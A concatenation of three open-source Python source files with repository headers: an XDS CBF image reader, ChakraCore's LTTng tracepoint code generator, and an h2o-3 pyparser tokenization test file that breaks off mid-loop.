#!/usr/bin/env libtbx.python # # iotbx.xds.xds_cbf.py # # <NAME>, Diamond Light Source, 2012/OCT/16 # # Class to read the CBF files used in XDS # from __future__ import absolute_import, division, print_function class reader: """A class to read the CBF files used in XDS""" def __init__(self): pass def read_file(self, filename): """Read the CBF file""" import pycbf self.cbf_handle = pycbf.cbf_handle_struct() self.cbf_handle.read_file(filename, pycbf.MSG_DIGEST) self.cbf_handle.rewind_datablock() def get_data(self): """Get the gain array from the file""" import numpy # Select the first datablock and rewind all the categories self.cbf_handle.select_datablock(0) self.cbf_handle.select_category(0) self.cbf_handle.select_column(2) self.cbf_handle.select_row(0) # Check the type of the element to ensure it's a binary # otherwise raise an exception type = self.cbf_handle.get_typeofvalue() if type.find('bnry') > -1: # Read the image data into an array image_string = self.cbf_handle.get_integerarray_as_string() image = numpy.fromstring(image_string, numpy.int32) # Get the array parameters parameters = self.cbf_handle.get_integerarrayparameters_wdims() image_size = (parameters[10], parameters[9]) # Resize the image image.shape = (image_size) else: raise TypeError('Can\'t find image') # Return the image return image if __name__ == '__main__': import sys import numpy handle = reader() handle.read_file(sys.argv[1]) image = handle.get_data()
tools/lttng.py
Taritsyn/ChakraCore
8,664
30346
#------------------------------------------------------------------------------------------------------- # Copyright (C) Microsoft. All rights reserved. # Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. #------------------------------------------------------------------------------------------------------- import xml.dom.minidom as DOM lttngDataTypeMapping = { "win:null" :" ", "win:Int64" :"const __int64", "win:ULong" :"const unsigned long", "win:count" :"*", "win:Struct" :"const char *", "win:GUID" :"const int", "win:AnsiString" :"const char*", "win:UnicodeString" :"const char*", "win:Double" :"const double", "win:Int32" :"const signed int", "win:HexInt32" :"const signed int", "win:Boolean" :"const bool", "win:UInt64" :"const unsigned __int64", "win:UInt32" :"const unsigned int", "win:UInt16" :"const unsigned short", "win:UInt8" :"const unsigned char", "win:Int8" :"const char", "win:Pointer" :"const uintptr_t", "win:Binary" :"const char" } ctfDataTypeMapping = { "win:Int64" :"ctf_integer", "win:HexInt64" :"ctf_integer_hex", "win:ULong" :"ctf_integer", "win:count" :"ctf_sequence", "win:Struct" :"ctf_sequence", "win:GUID" :"ctf_sequence", "win:AnsiString" :"ctf_string", "win:UnicodeString" :"ctf_string", "win:Double" :"ctf_float", "win:Int32" :"ctf_integer", "win:HexInt32" :"ctf_integer_hex", "win:Boolean" :"ctf_integer", "win:UInt64" :"ctf_integer", "win:UInt32" :"ctf_integer", "win:UInt16" :"ctf_integer", "win:HexInt16" :"ctf_integer_hex", "win:UInt8" :"ctf_integer", #actually a character "win:Int8" :"ctf_integer", #actually a character "win:Pointer" :"ctf_integer", "win:Binary" :"ctf_sequence", "xs:string" :"ctf_string", "xs:unsignedLong" :"ctf_integer", "xs:unsignedInt" :"ctf_integer" } palDataTypeMapping ={ "win:null" :" ", "win:Int64" :"const __int64", "win:ULong" :"const unsigned long", "win:count" :"*", "win:Struct" :"const void", "win:GUID" :"const GUID", "win:AnsiString" :"LPCSTR", "win:UnicodeString" :"PCWSTR", "win:Double" :"const double", "win:Int32" :"const signed int", "win:HexInt32" :"const signed int", "win:Boolean" :"const bool", "win:UInt64" :"const unsigned __int64", "win:UInt32" :"const unsigned int", "win:UInt16" :"const unsigned short", "win:UInt8" :"const unsigned char", "win:Int8" :"const char", "win:Pointer" :"const void*", "win:Binary" :"const char" } MAX_LTTNG_ARGS = 10 def getParamSequenceSize(paramSequence, estimate): total = 0 pointers =0 for param in paramSequence: if param in ["win:Int64", "win:UInt64", "win:Double"]: total += 8 elif param in ["win:ULong", "win:Int32", "win:Boolean",]: total += 4 elif param == "GUID": total += 16 elif param in ["win:UInt16"]: total += 2 elif param in ["win:Uint8", "win:Binary"]: total += 1 elif param == "win:Pointer": if estimate: total += 8 else: pointers += 1 elif estimate: if param in ["win:AnsiString", "win:Struct"]: total += 32 elif param in ["win:UnicodeString"]: total += 64 else: raise Exception ("Don't know size of " + param) if estimate: return total return total, pointers class Template: def __repr__(self): return "<Template " + self.name + " />" def __init__(self, name, prototypes, dependencies, structCounts, arrayCounts): self.name = name self.signature = FunctionSignature() self.structCounts = structCounts self.arrayCounts = arrayCounts for variable in prototypes.paramList: for dependency in dependencies[variable]: if not self.signature.getParam(dependency): self.signature.append(dependency, prototypes.getParam(dependency)) @property def num_params(self): return len(self.signature.paramList) def getParam(self, name): return self.signature.getParam(name) @property def estimatedSize(self): total = getParamSequenceSize((self.getParam(paramName).winType for paramName in self.signature.paramList), True) if total < 32: return 32 elif total > 1024: return 1024 return total class FunctionSignature: def __repr__(self): return ', '.join(self.paramList) def __init__(self): self.LUT = {} self.paramList = [] def append(self, variable, param): self.LUT[variable] = param self.paramList.append(variable) def getParam(self, variable): return self.LUT.get(variable) def getLength(self): return len(self.paramList) class FunctionParameter: def __repr__(self): return self.name def __init__(self, winType, name, count, outType, length): self.winType = winType self.outType = outType self.name = name self.length = length self.count = "win:null" if winType == "win:GUID" or count == "win:count": self.count = "win:count" ignoredXmlAttributes = frozenset(["map"]) usedXmlAttributes = frozenset(["name", "inType", "count", "length", "outType"]) knownXmlAttributes = ignoredXmlAttributes | usedXmlAttributes def checkKnownAttributes(nodes, templateName): for node in nodes: nodeMap = node.attributes for attribute in nodeMap.values(): if attribute.name not in knownXmlAttributes: raise ValueError('Unknown attribute: ' + attribute.name + ' in template ' + templateName) def getTopLevelElementsByTagName(node, tag): return [e for e in node.getElementsByTagName(tag) if e.parentNode == node] def parseTemplateNodes(templateNodes): templates = {} for templateNode in templateNodes: templateName = templateNode.getAttribute('tid') dataNodes = getTopLevelElementsByTagName(templateNode, 'data') checkKnownAttributes(dataNodes, templateName) functionPrototypes = FunctionSignature() arrayCounts = {} structCounts = {} var_Dependencies = {} for dataNode in dataNodes: variable = dataNode.getAttribute('name') wintype = dataNode.getAttribute('inType') outType = dataNode.getAttribute('outType') wincount = dataNode.getAttribute('count') winLength = dataNode.getAttribute('length') var_dependency = [variable] if winLength: if wincount: raise Exception("Both count and length properties found on " + variable + " in template " + templateName) if wincount.isdigit() and int(wincount) == 1: wincount = '' if wincount: if wincount.isdigit(): raise Exception("Expect constant count to be length") elif functionPrototypes.getParam(wincount): var_dependency.insert(0, wincount) arrayCounts[variable] = wincount var_Dependencies[variable] = var_dependency functionParameter = FunctionParameter(wintype, variable, wincount, outType, winLength) functionPrototypes.append(variable, functionParameter) structNodes = getTopLevelElementsByTagName(templateNode, 'struct') for structNode in structNodes: structName = structNode.getAttribute('name') countName = structNode.getAttribute('count') assert(countName in functionPrototypes.paramList) #childData = structNode.getElementsByTagName("data") #names = [x.attributes['name'].value for x in childData] #types = [x.attributes['inType'].value for x in childData] structCounts[structName] = countName var_Dependencies[structName] = [countName, structName] functionParameterPointer = FunctionParameter("win:Struct", structName, "win:count", None, None) functionPrototypes.append(structName, functionParameterPointer) templates[templateName] = Template(templateName, functionPrototypes, var_Dependencies, structCounts, arrayCounts) return templates def shouldPackTemplate(template): return template.num_params > MAX_LTTNG_ARGS or len(template.structCounts) > 0 or len(template.arrayCounts) > 0 def generateArgList(template): # Construct a TP_ARGS macro call, as defined in another macro, e.g. # # TP_ARGS( \ # int, my_integer_arg, \ # char*, my_string_arg \ # ) header = "TP_ARGS( \\\n" footer = "\\\n)" args = [] if shouldPackTemplate(template): args.append(" const unsigned int, length") args.append(" const char *, __data__") else: signature = template.signature for param in signature.paramList: functionParam = signature.getParam(param) wintypeName = functionParam.winType mappedType = lttngDataTypeMapping[wintypeName] winCount = functionParam.count mappedCount = lttngDataTypeMapping[winCount] arg = " " + mappedType if mappedCount != " ": arg += mappedCount elif functionParam.length: arg += "*" arg += ", " + functionParam.name args.append(arg) return header + ", \\\n".join(args) + footer def generateFieldList(template): # Construct a TP_FIELDS macro call, e.g. # TP_FIELDS( # ctf_string(my_string_field, my_string_arg) # ctf_integer(int, my_integer_field, my_integer_arg) # ) header = " " + " TP_FIELDS(\n" footer = "\n )" fieldList = [] if shouldPackTemplate(template): fieldList.append(" ctf_integer(unsigned long, length, length)") fieldList.append(" ctf_sequence(char, __data__, __data__, unsigned long, length)") else: signature = template.signature for param in signature.paramList: functionParam = signature.getParam(param) wintypeName = functionParam.winType winCount = functionParam.count mappedCount = lttngDataTypeMapping[winCount] mappedType = lttngDataTypeMapping[wintypeName].replace("const ", "") if functionParam.outType: wintypeName = functionParam.outType ctf_type = None field_body = None varname = functionParam.name if param in template.structCounts or param in template.arrayCounts: # This is a struct, treat as a sequence countVar = template.structCounts.get(param, template.arrayCounts.get(param)) ctf_type = "ctf_sequence" field_body = ", ".join((mappedType, varname, varname, "size_t", functionParam.prop)) elif functionParam.length: ctf_type = "ctf_sequence" field_body = ", ".join((mappedType, varname, varname, "size_t", functionParam.length)) else: ctf_type = ctfDataTypeMapping[wintypeName] if ctf_type == "ctf_string": field_body = ", ".join((varname, varname)) elif ctf_type == "ctf_integer" or ctf_type == "ctf_integer_hex" or ctf_type == "ctf_float": field_body = ", ".join((mappedType, varname, varname)) elif ctf_type == "ctf_sequence": raise Exception("ctf_sequence needs special handling: " + template.name + " " + param) else: raise Exception("Unhandled ctf intrinsic: " + ctf_type) # fieldList.append("// " + wintypeName) fieldList.append(" %s(%s)" % (ctf_type, field_body)) return header + "\n".join(fieldList) + footer def generateLttngHeader(providerName, lttngEventHeaderShortName, templates, events): headerLines = [] headerLines.append("") headerLines.append("#ifdef __int64") headerLines.append("#if TARGET_64") headerLines.append("#undef __int64") headerLines.append("#else") headerLines.append("#error \"Linux and OSX builds only support 64bit platforms\"") headerLines.append("#endif // TARGET_64") headerLines.append("#endif // __int64") headerLines.append("#undef TRACEPOINT_PROVIDER") headerLines.append("#undef TRACEPOINT_INCLUDE") headerLines.append("") headerLines.append("#define TRACEPOINT_PROVIDER " + providerName + "\n") headerLines.append("#define TRACEPOINT_INCLUDE \"./" + lttngEventHeaderShortName + "\"\n\n") headerLines.append("#if !defined(LTTNG_CHAKRA_H" + providerName + ") || defined(TRACEPOINT_HEADER_MULTI_READ)\n\n") headerLines.append("#define LTTNG_CHAKRA_H" + providerName +"\n") headerLines.append("\n#include <lttng/tracepoint.h>\n\n") for templateName in templates: template = templates[templateName] functionSignature = template.signature headerLines.append("") headerLines.append("#define " + templateName + "_TRACEPOINT_ARGS \\") tracepointArgs = generateArgList(template) headerLines.append(tracepointArgs) headerLines.append("TRACEPOINT_EVENT_CLASS(") headerLines.append(" " + providerName + ",") headerLines.append(" " + templateName + ",") headerLines.append(" " + templateName + "_TRACEPOINT_ARGS,") tracepointFields = generateFieldList(template) headerLines.append(tracepointFields) headerLines.append(")") headerLines.append("#define " + templateName + "T_TRACEPOINT_INSTANCE(name) \\") headerLines.append("TRACEPOINT_EVENT_INSTANCE(\\") headerLines.append(" " + providerName + ",\\") headerLines.append(" " + templateName + ",\\") headerLines.append(" name,\\") headerLines.append(" " + templateName + "_TRACEPOINT_ARGS \\") headerLines.append(")") headerLines.append("") headerLines.append("") headerLines.append("TRACEPOINT_EVENT_CLASS(") headerLines.append(" " + providerName + ",") headerLines.append(" emptyTemplate,") headerLines.append(" TP_ARGS(),") headerLines.append(" TP_FIELDS()") headerLines.append(")") headerLines.append("#define T_TRACEPOINT_INSTANCE(name) \\") headerLines.append("TRACEPOINT_EVENT_INSTANCE(\\") headerLines.append(" " + providerName + ",\\") headerLines.append(" emptyTemplate,\\") headerLines.append(" name,\\") headerLines.append(" TP_ARGS()\\") headerLines.append(")") headerLines.append("") for eventNode in events: eventName = eventNode.getAttribute('symbol') templateName = eventNode.getAttribute('template') if not eventName: raise Exception(eventNode + " event does not have a symbol") if not templateName: headerLines.append("T_TRACEPOINT_INSTANCE(" + eventName + ")") continue headerLines.append(templateName + "T_TRACEPOINT_INSTANCE(" + eventName + ")") headerLines.append("#endif /* LTTNG_CHAKRA_H" + providerName + " */") headerLines.append("#include <lttng/tracepoint-event.h>") return "\n".join(headerLines) def generateMethodBody(template, providerName, eventName): # Convert from ETW's windows types to LTTng compatiable types methodBody = [""] functionSignature = template.signature if not shouldPackTemplate(template): invocation = ["do_tracepoint(" + providerName, eventName] for paramName in functionSignature.paramList: functionParam = functionSignature.getParam(paramName) wintypeName = functionParam.winType winCount = functionParam.count ctf_type = None if functionParam.outType: ctf_type = ctfDataTypeMapping.get(functionParam.outType) else: ctf_Type = ctfDataTypeMapping.get(winCount) if not ctf_type: ctf_type = ctfDataTypeMapping[wintypeName] if ctf_type == "ctf_string" and wintypeName == "win:UnicodeString": # Convert wchar unicode string to utf8 if functionParam.length: methodBody.append("utf8::WideToNarrow " + paramName + "_converter(" + paramName + ", " + functionParam.length + ");") else: methodBody.append("utf8::WideToNarrow " + paramName + "_converter(" + paramName + ");") invocation.append(paramName + "_converter") # elif ctf_type == "ctf_sequence" or wintypeName == "win:Pointer": elif wintypeName == "win:Pointer": invocation.append("(" + lttngDataTypeMapping[wintypeName] + lttngDataTypeMapping[winCount] + ")" + paramName) else: invocation.append(paramName) methodBody.append(",\n ".join(invocation) + ");") else: # Packing results into buffer methodBody.append("char stackBuffer[" + str(template.estimatedSize) + "];") methodBody.append("char *buffer = stackBuffer;") methodBody.append("int offset = 0;") methodBody.append("int size = " + str(template.estimatedSize) + ";") methodBody.append("bool fixedBuffer = true;") methodBody.append("bool success = true;") for paramName in functionSignature.paramList: functionParameter = functionSignature.getParam(paramName) if paramName in template.structCounts: size = "(unsigned int)" + paramName + "_ElementSize * (unsigned int)" + template.structCounts[paramName] methodBody.append("success &= WriteToBuffer((const char *)" + paramName + ", " + size + ", buffer, offset, size, fixedBuffer);") elif paramName in template.arrayCounts: size = "sizeof(" + lttngDataTypeMapping[functionParameter.winType] + ") * (unsigned int)" + template.arrayCounts[paramName] methodBody.append("success &= WriteToBuffer((const char *)" + paramName + ", " + size + ", buffer, offset, size, fixedBuffer);") elif functionParameter.winType == "win:GUID": methodBody.append("success &= WriteToBuffer(*" + paramName + ", buffer, offset, size, fixedBuffer);") else: methodBody.append("success &= WriteToBuffer(" + paramName + ", buffer, offset, size, fixedBuffer);") methodBody.append("if (!success)") methodBody.append("{") methodBody.append(" if (!fixedBuffer) delete[] buffer;") methodBody.append(" return ERROR_WRITE_FAULT;") methodBody.append("}") methodBody.append("do_tracepoint(" + providerName + ", " + eventName + ", offset, buffer);") methodBody.append("if (!fixedBuffer) delete[] buffer;") return "\n ".join(methodBody) + "\n" def generateMethodSignature(template): if not template: return "" functionSignature = template.signature lineFunctionPrototype = [] for paramName in functionSignature.paramList: functionParameter = functionSignature.getParam(paramName) wintypeName = functionParameter.winType mappedType = palDataTypeMapping[wintypeName] winCount = functionParameter.count mappedCount = palDataTypeMapping[winCount] if paramName in template.structCounts: lineFunctionPrototype.append(" int " + paramName + "_ElementSize") # lineFunctionPrototype.append("// " + wintypeName + " " + str(functionParameter.length)) lineFunctionPrototype.append( " " + mappedType + (mappedCount if mappedCount != " " else "*" if functionParameter.length and not wintypeName in ["win:UnicodeString", "win:AnsiString"] else "") + " " + functionParameter.name) return ",\n".join(lineFunctionPrototype) def generateLttngTracepointProvider(providerName, lttngHeader, templates, events): providerLines = []; providerLines.append("#define TRACEPOINT_DEFINE") providerLines.append("#ifndef CHAKRA_STATIC_LIBRARY") providerLines.append("#define TRACEPOINT_PROBE_DYNAMIC_LINKAGE") providerLines.append("#endif") providerLines.append("#include \"stdlib.h\"") providerLines.append("#include \"Common.h\"") providerLines.append("#include \"Codex/Utf8Helper.h\"") providerLines.append("#include \"" + lttngHeader + "\"\n\n") providerLines.append("#ifndef tracepoint_enabled") providerLines.append("#define tracepoint_enabled(provider, name) 1") providerLines.append("#define do_tracepoint tracepoint") providerLines.append("#endif") providerLines.append(""" bool ResizeBuffer(char *&buffer, int&size, int currentLength, int newSize, bool &fixedBuffer) { newSize *= 1.5; _ASSERTE(newSize > size); // Check for overflow if (newSize < 32) { newSize = 32; } char *newBuffer = new char[newSize]; memcpy(newBuffer, buffer, currentLength); if (!fixedBuffer) { delete[] buffer; } buffer = newBuffer; size = newSize; fixedBuffer = false; return true; } bool WriteToBuffer(const char * src, int len, char *&buffer, int &offset, int &size, bool &fixedBuffer) { if (!src) { return true; } if (offset + len > size) { if (!ResizeBuffer(buffer, size, offset, size+len, fixedBuffer)) { return false; } } memcpy(buffer + offset, src, len); offset += len; return true; } template <typename T> bool WriteToBuffer(const T &value, char *&buffer, int&offset, int&size, bool &fixedBuffer) { if (sizeof(T) + offset > size) { if (!ResizeBuffer(buffer, size, offset, size + sizeof(T), fixedBuffer)) { return false; } } *(T *)(buffer + offset) = value; offset += sizeof(T); return true; } """) for eventNode in events: eventName = eventNode.getAttribute('symbol') templateName = eventNode.getAttribute('template') providerLines.append("extern \"C\" bool EventXplatEnabled%s(){ return tracepoint_enabled(%s, %s);}" % (eventName, providerName, eventName)) providerLines.append("") template = None if templateName: template = templates[templateName] providerLines.append("extern \"C\" unsigned long FireEtXplat" + eventName + "(") providerLines.append(generateMethodSignature(template)) providerLines.append(")") providerLines.append("{") providerLines.append(" if (!EventXplatEnabled" + eventName + "())") providerLines.append(" return ERROR_SUCCESS;") if template: providerLines.append(generateMethodBody(template, providerName, eventName)) else: providerLines.append(" do_tracepoint(" + providerName + ", " + eventName +");") providerLines.append("") providerLines.append(" return ERROR_SUCCESS;") providerLines.append("}") providerLines.append("") return "\n".join(providerLines) def generateEtwHeader(templates, events): headerLines = [] headerLines.append("#include \"pal.h\"") headerLines.append("") for event in events: eventName = event.getAttribute('symbol') templateName = event.getAttribute('template') template = None if templateName: template = templates[templateName] callArgs = [] if template: functionSignature = template.signature for param in functionSignature.paramList: if param in template.structCounts: callArgs.append(param + "_ElementSize") callArgs.append(param) headerLines.append("extern \"C\" bool EventXplatEnabled" + eventName +"();") headerLines.append("inline bool EventEnabled" + eventName +"() { return EventXplatEnabled" + eventName + "();}") headerLines.append("") headerLines.append("extern \"C\" unsigned long FireEtXplat" + eventName +" (") headerLines.append(generateMethodSignature(template)) headerLines.append(");") headerLines.append("inline unsigned long EventWrite" + eventName + "(") headerLines.append(generateMethodSignature(template)) headerLines.append(")") headerLines.append("{") headerLines.append(" return FireEtXplat" + eventName + "(" + ", ".join(callArgs) + ");") headerLines.append("}") headerLines.append("") return "\n".join(headerLines) def generateCmakeFile(providerName): cmakeLines = [] cmakeLines.append("project(Chakra.LTTng)") cmakeLines.append("") cmakeLines.append("add_compile_options(-fPIC)") cmakeLines.append("") cmakeLines.append("add_library (Chakra.LTTng OBJECT") cmakeLines.append(" eventprovider" + providerName + ".cpp") cmakeLines.append(" tracepointprovider" + providerName + ".cpp") cmakeLines.append(")") return "\n".join(cmakeLines) def generateLttngFiles(manifest, providerDirectory): import os tree = DOM.parse(manifest) if not os.path.exists(providerDirectory): os.makedirs(providerDirectory) if not os.path.exists(providerDirectory + "/lttng"): os.makedirs(providerDirectory + "/lttng") for providerNode in tree.getElementsByTagName("provider"): providerName = providerNode.getAttribute("name") providerName = providerName.replace("Microsoft-", "") providerNameFile = providerName.lower() lttngEventHeaderShortName = "tp" + providerNameFile + ".h" lttngEventHeaderPath = providerDirectory + "/lttng/" + lttngEventHeaderShortName lttngEventProvider = providerDirectory + "/lttng/eventprovider" + providerNameFile + ".cpp" lttngEventProviderTrace = providerDirectory + "/lttng/tracepointprovider" + providerNameFile + ".cpp" lttngEtwHeaderFile = providerDirectory + "/lttng/" + providerNameFile + "Etw.h" lttngCmakeFile = providerDirectory + "/lttng/CMakeLists.txt" lttngHeader = open(lttngEventHeaderPath, "w") lttngImplementation = open(lttngEventProvider, "w") lttngTraceImplementation = open(lttngEventProviderTrace, "w") lttngEtwHeader = open(lttngEtwHeaderFile, "w") lttngCmake = open(lttngCmakeFile, "w") # Create the lttng implementation lttngTraceImplementation.write("#define TRACEPOINT_CREATE_PROBES\n") lttngTraceImplementation.write("#include \"./"+lttngEventHeaderShortName+"\"\n") lttngTraceImplementation.close() # Create the lttng header templateNodes = providerNode.getElementsByTagName('template') eventNodes = providerNode.getElementsByTagName('event') allTemplates = parseTemplateNodes(templateNodes) lttngHeader.write(generateLttngHeader(providerName, lttngEventHeaderShortName, allTemplates, eventNodes)) lttngHeader.close(); lttngImplementation.write(generateLttngTracepointProvider(providerName, lttngEventHeaderShortName, allTemplates, eventNodes)) lttngImplementation.close(); lttngEtwHeader.write(generateEtwHeader(allTemplates, eventNodes)) lttngEtwHeader.close() # Note: This in particular assumes that there is only one ETW provider lttngCmake.write(generateCmakeFile(providerNameFile)) lttngCmake.close() if __name__ == '__main__': import argparse import sys parser = argparse.ArgumentParser(description="Generates the Code required to instrument LTTtng logging mechanism") required = parser.add_argument_group('required arguments') required.add_argument('--man', type=str, required=True, help='full path to manifest containig the description of events') required.add_argument('--intermediate', type=str, required=True, help='full path to eventprovider intermediate directory') args, unknown = parser.parse_known_args(sys.argv[1:]) if unknown: print('Unknown argument(s): ', ', '.join(unknown)) sys.exit(1) generateLttngFiles(args.man, args.intermediate) sys.exit(0)
h2o-bindings/bin/pyunit_parser_test.py
vishalbelsare/h2o-3
6,098
30351
<reponame>vishalbelsare/h2o-3 #!/usr/bin/env python # -*- encoding: utf-8 -*- """Test case for pyparser.""" from __future__ import division, print_function import os import re import textwrap import tokenize from future.builtins import open import pyparser def _make_tuple(op): return lambda x: (op, x) NL = tokenize.NL NEWLINE = tokenize.NEWLINE NAME = _make_tuple(tokenize.NAME) OP = _make_tuple(tokenize.OP) INDENT = tokenize.INDENT DEDENT = tokenize.DEDENT COMMENT = tokenize.COMMENT STRING = tokenize.STRING NUMBER = tokenize.NUMBER END = tokenize.ENDMARKER token_names = {NL: "NL", NEWLINE: "NEWLINE", INDENT: "INDENT", COMMENT: "COMMENT", DEDENT: "DEDENT", STRING: "STRING", NUMBER: "NUMBER", END: "END", tokenize.OP: "OP", tokenize.NAME: "NAME"} Ws = pyparser.Whitespace Comment = pyparser.Comment Comment_banner = (pyparser.Comment, "banner") Comment_code = (pyparser.Comment, "code") Docstring = pyparser.Docstring Import_future = (pyparser.ImportBlock, "future") Import_stdlib = (pyparser.ImportBlock, "stdlib") Import_3rdpty = (pyparser.ImportBlock, "third-party") Import_1stpty = (pyparser.ImportBlock, "first-party") Expression = pyparser.Expression Function = (pyparser.Callable, "def") Class = (pyparser.Callable, "class") def assert_same_code(code1, code2): """Verify whether 2 code fragments are identical, and if not print an error message.""" regex = re.compile(r"\s+\\$", re.M) code1 = re.sub(regex, r"\\", code1) code2 = re.sub(regex, r"\\", code2) if code2 != code1: print() lines_code1 = code1.splitlines() lines_code2 = code2.splitlines() n_diffs = 0 for i in range(len(lines_code1)): old_line = lines_code1[i] new_line = lines_code2[i] if i < len(lines_code2) else "" if old_line != new_line: print("%3d - %s" % (i + 1, old_line)) print("%3d + %s" % (i + 1, new_line)) n_diffs += 1 if n_diffs == 5: break raise AssertionError("Unparsed code1 does not match the original.") def test_tokenization(): """ Test function for ``pyparser._normalize_tokens()``. Even though this function is private, it is extremely important to verify that it behaves correctly. In particular, we want to check that it does not break the round-trip guarantee of the tokenizer, and that it fixes all the problems that the original tokenizer has. """ # Helper functions def _parse_to_tokens(text): """Parse text into tokens and then normalize them.""" gen = iter(text.splitlines(True)) # True = keep newlines readline = gen.next if hasattr(gen, "next") else gen.__next__ return pyparser._tokenize(readline) def _unparse_tokens(tokens): """Convert tokens back into the source code.""" return tokenize.untokenize(t.token for t in tokens) def _assert_tokens(tokens, target): """Check that the tokens list corresponds to the target provided.""" for i in range(len(tokens)): assert i < len(target), "Token %d %r not expected" % (i, tokens[i]) tok = tokens[i] trg = target[i] valid = False if isinstance(trg, int): if tok.op == trg: valid = True name = token_names[trg] elif isinstance(trg, tuple) and len(trg) == 2: if tok.op == trg[0] and tok.str == trg[1]: valid = True name = "%s(%s)" % (token_names[trg[0]], trg[1]) else: assert False, "Unknown target: %r" % trg if not valid: assert False, "Mismatched token %d: found %r, should be %r" % (i, tok, name) assert len(target) == len(tokens), "Expected too many tokens: %d vs %d" % (len(tokens), len(target)) def check_code(code, expected_tokens=None, filename=None): """Test parsing of the given piece of code.""" code = textwrap.dedent(code) if filename: print("Testing tokenization of %s:" % filename, end=" ") else: check_code.index = getattr(check_code, "index", 0) + 1 print("Testing tokenization %d:" % check_code.index, end=" ") tokens = _parse_to_tokens(code) try: try: unparsed = _unparse_tokens(tokens) except ValueError as e: raise AssertionError("Cannot unparse tokens: %s" % e) assert_same_code(code, unparsed) if expected_tokens: _assert_tokens(tokens, expected_tokens) print("ok") except AssertionError as e: print(u"Error: %s" % e) print(u"Original code fragment:\n" + code) print("Tokens:") for i, tok in enumerate(tokens): print("%3d %r" % (i, tok)) raise check_code(""" try: while True: pass # comment except: pass """, [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE, COMMENT, NL, DEDENT, DEDENT, NAME("except"), OP(":"), NAME("pass"), NEWLINE, END] ) check_code(""" try: while True: pass # comment except: pass """, [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE, DEDENT, COMMENT, NL, DEDENT, NAME("except"), OP(":"), NAME("pass"), NEWLINE, END] ) check_code(""" try: while True: pass # comment except: pass """, [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE, DEDENT, DEDENT, COMMENT, NL, NAME("except"), OP(":"), NAME("pass"), NEWLINE, END] ) check_code(""" def func(): # function pass """, [NL, NAME("def"), NAME("func"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, COMMENT, NL, NAME("pass"), NEWLINE, DEDENT, END]) check_code(""" def func(): # function # hanging comment pass """, [NL, NAME("def"), NAME("func"), OP("("), OP(")"), OP(":"), COMMENT, NEWLINE, INDENT, COMMENT, NL, NAME("pass"), NEWLINE, DEDENT, END]) check_code(""" def foo(): pass #comment def bar(): pass """, [NL, NAME("def"), NAME("foo"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE, DEDENT, NL, COMMENT, NL, NAME("def"), NAME("bar"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE, DEDENT, END]) check_code(""" def hello(): print("hello") """, [NL, NAME("def"), NAME("hello"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NL, NL, NAME("print"), OP("("), STRING, OP(")"), NEWLINE, DEDENT, END]) check_code(""" class Foo: def foo(self): pass def bar(self): return """, [NL, NAME("class"), NAME("Foo"), OP(":"), NEWLINE, INDENT, NAME("def"), NAME("foo"), OP("("), NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE, DEDENT, NL, NAME("def"), NAME("bar"), OP("("), NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT, NAME("return"), NEWLINE, DEDENT, DEDENT, END]) check_code(""" def foo(): # Attempt to create the output directory try: os.makedirs(destdir) except OSError as e: raise """, [NL, NAME("def"), NAME("foo"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, COMMENT, NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("os"), OP("."), NAME("makedirs"), OP("("), NAME("destdir"), OP(")"), NEWLINE, DEDENT, NAME("except"), NAME("OSError"), NAME("as"), NAME("e"), OP(":"), NEWLINE, INDENT, NAME("raise"), NEWLINE, DEDENT, DEDENT, END]) check_code(""" if PY2: def unicode(): raise RuntimeError # disable this builtin function # because it doesn't exist in Py3 handler = lambda: None # noop # (will redefine later) ################################################################################ # comment 1 print("I'm done.") """, [NL, NAME("if"), NAME("PY2"), OP(":"), NEWLINE, INDENT, NAME("def"), NAME("unicode"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NAME("raise"), NAME("RuntimeError"), COMMENT, NEWLINE, COMMENT, NL, DEDENT, DEDENT, NL, NAME("handler"), OP("="), NAME("lambda"), OP(":"), NAME("None"), COMMENT, NEWLINE, COMMENT, NL, NL, COMMENT, NL, NL, COMMENT, NL, NAME("print"), OP("("), STRING, OP(")"), NEWLINE, END]) check_code(""" def test3(): x = 1 # bad print(x) """, [NL, NAME("def"), NAME("test3"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NAME("x"), OP("="), NUMBER, NEWLINE, COMMENT, NL, NAME("print"), OP("("), NAME("x"), OP(")"), NEWLINE, DEDENT, END]) check_code(""" class Foo(object): #------------- def bar(self): if True: pass # Originally the DEDENTs are all the way down near the decorator. Here we're testing how they'd travel # all the way up across multiple comments. # comment 3 # commmmmmmment 4 @decorator """, [NL, NAME("class"), NAME("Foo"), OP("("), NAME("object"), OP(")"), OP(":"), NEWLINE, INDENT, COMMENT, NL, NAME("def"), NAME("bar"), OP("("), NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT, NAME("if"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE, DEDENT, DEDENT, DEDENT, NL, COMMENT, NL, COMMENT, NL, NL, COMMENT, NL, NL, COMMENT, NL, OP("@"), NAME("decorator"), NEWLINE, END]) # Really, one should avoid code like this.... It won't break the normalizer, but may create problems down # the stream. check_code(""" if True: if False: # INDENT will be inserted before this comment raise # DEDENT will be after this comment else: praise() """, [NL, NAME("if"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("if"), NAME("False"), OP(":"), NEWLINE, INDENT, COMMENT, NL, NAME("raise"), NEWLINE, COMMENT, NL, DEDENT, NAME("else"), OP(":"), NEWLINE, INDENT, NAME("praise"), OP("("), OP(")"), NEWLINE, DEDENT, DEDENT, END]) for directory in [".", "../../h2o-py/h2o", "../../h2o-py/tests"]: absdir = os.path.abspath(directory) for dir_name, 